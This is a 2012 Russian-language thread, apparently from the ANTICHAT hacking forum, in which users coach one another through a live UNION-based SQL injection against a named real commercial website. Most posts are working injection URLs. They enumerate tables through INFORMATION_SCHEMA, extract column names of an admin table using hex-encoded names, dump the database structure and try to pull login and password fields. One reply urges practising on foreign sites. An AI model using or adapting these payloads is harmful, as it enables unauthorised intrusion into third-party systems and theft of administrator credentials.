ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
19.03.2012, 18:27
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
так те ссылочки что оставил ettee уже не работают
|
|
|
19.03.2012, 18:55
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
Сообщение от qaz
так те ссылочки что оставил ettee уже не работают
|
|
|
|
19.03.2012, 18:59
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
та попробовать то можно но чем я заменю функцию
?
|
|
|
|
19.03.2012, 20:56
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
Провел на форуме:
13018
Репутация:
0
|
|
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10+FROM+ INFORMATION_SCHEMA.TABLES+LIMIT+51,1+--+
Как вывести все поля из этой таблицы?
В title ответ
|
|
|
|
19.03.2012, 20:59
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от foma9999
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10+FROM+ INFORMATION_SCHEMA.TABLES+LIMIT+51,1+--+
Как вывести все поля из этой таблицы?
В title ответ
Код:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,group_concat(COLUMN_NAME),3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x52726567696f6e7341646d696e73--+a
Где
0x52726567696f6e7341646d696e73 == RregionsAdmins в HEX.
|
|
|
|
19.03.2012, 21:03
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
Провел на форуме:
183267
Репутация:
84
|
|
Сообщение от foma9999
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10+FROM+ INFORMATION_SCHEMA.TABLES+LIMIT+51,1+--+
Как вывести все поля из этой таблицы?
В title ответ
Код:
http://www.svrwheels.ru
/index.php?pageId=-2+union+select+1,Group_concat%28column_name%29,3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.columns+Where+table_name=0x52726567696f6e7341646d696e73+--+
Ereee опередил...
|
|
|
|
19.03.2012, 21:09
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
Провел на форуме:
13018
Репутация:
0
|
|
Сообщение от Ereee
Код:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,group_concat(COLUMN_NAME),3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x52726567696f6e7341646d696e73--+a
Где
0x52726567696f6e7341646d696e73 == RregionsAdmins в HEX. Спасибо!
А как вывести структуру бд?
как тут http://i.imgur.com/5e1qH.png
UPD:
Почему
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,pass,login,4,5,6,7,8,9,10+FROM+0x 52726567696f6e7341646d696e73+--+
ничего не выводит, кроме ошибки? Что не так?
|
|
|
|
19.03.2012, 21:21
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354
Репутация:
267
|
|
Структура:
Код:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,(select%20@pro%20from%20(%20select%20@pro:=0x2727,%20(select%20null%20from%20information_schema.tables%20where%20concat(table_schema,0x2e,table_name)%20not%20in(%20@pro:=concat(@pro,0x2c27,table_schema,0x2e,table_name,0x27))limit%200,1))f),3,4,5,6,7,8,9,10--+a
По-твоему вопросу:
1. Нельзя после FROM имя таблицы в hex переводит.
2. Твоя таблица в другой базе:
Код:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,concat(table_name,0x3a,table_schema),3,4,5,6,7,8,9,10+FROM+information_schema.tables+limit+51,1--+a
3. Тебе нужно потренироватся на буржуйских сайтах.
4. Пустая таблица:
Код:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,count(*),3,4,5,6,7,8,9,10+FROM+u261330_catalog.RregionsAdmins+limit+0,1--+a
В написано, что записей "0". |
|
|
|
19.03.2012, 21:26
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
Провел на форуме:
13018
Репутация:
0
|
|
Сообщение от Ereee
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,(select%20@pro%20from%20(%20selec t%20@pro:=0x2727,%20(select%20null%20from%20inform ation_schema.tables%20where%20concat(table_schema, 0x2e,table_name)%20not%20in(%20@pro:=concat(@pro,0 x2c27,table_schema,0x2e,table_name,0x27))limit%200 ,1))f),3,4,5,6,7,8,9,10--+a
что значит а после коммента?
|
|
|
|
19.03.2012, 21:53
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от foma9999
что значит а после коммента?
дамы и господа прежде чем задавать какиелибо вопросы по SQL-иньекциям ознакомтись пожалуйсто со статьей http://forum.antichat.net/thread43966.html а потом только выесняйте непонятные моменты! ("а" обсолютно ничего не значит после комента, так как она закоментирована)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
